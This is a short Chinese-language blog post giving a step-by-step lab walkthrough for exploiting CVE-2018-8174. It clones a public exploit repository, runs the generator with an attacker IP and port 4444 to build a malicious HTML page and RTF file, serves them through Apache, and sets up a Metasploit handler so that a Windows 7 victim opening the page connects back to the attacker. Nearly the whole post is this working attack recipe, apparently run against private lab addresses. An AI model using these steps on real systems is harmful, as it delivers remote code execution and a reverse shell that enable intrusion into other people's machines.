CVE-2018-8174

 

 

 

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git     从github上下载文件

cd CVE-2018-8174_EXP.git     进入文件夹

 

 

 

 python CVE-2018-8174.py -u http://192.168.44.131/expolit.html -o hack.rtf -i 192.168.44.131 -p 4444

(-u 是攻击机的地址 -o生成一个文件 -i建立一个反弹链接 接口为4444)

 

 cp exploit.html /var/www/html(将exploit.html 复制到var/www/html)

systemctl start apache2(启动阿帕奇服务)

cp hack.rtf /var/www/html (将文件复制到路径中)

 

 接下来

启动msfconsole 模块

search handler找一下服务

使用命令,设置后台↓

show options(查看配置信息)

set lhost 192.168.44.131(设置下配置信息中的lhost)

  • set RHOST 目标主机地址 :该命令会设置好要攻击的目标主机地址
  • set LHOST 攻击机地址 :该命令设置攻击机的地址,使目标主机回连至攻击机
  • set LPORT 回连的端口 :该命令设置目标主机回连至攻击机的端口,默认为4444

 

 

 

 然后用win7访问目标的网站

 

访问阿帕奇默认网页下的刚刚的python生成的文件

 

网页闪退,但是攻击机得到了响应

在kail中输入run命令运行

 

 

 

 

 

 
posted @ 2022-05-14 00:09  南海一片心  阅读(106)  评论(0)    收藏  举报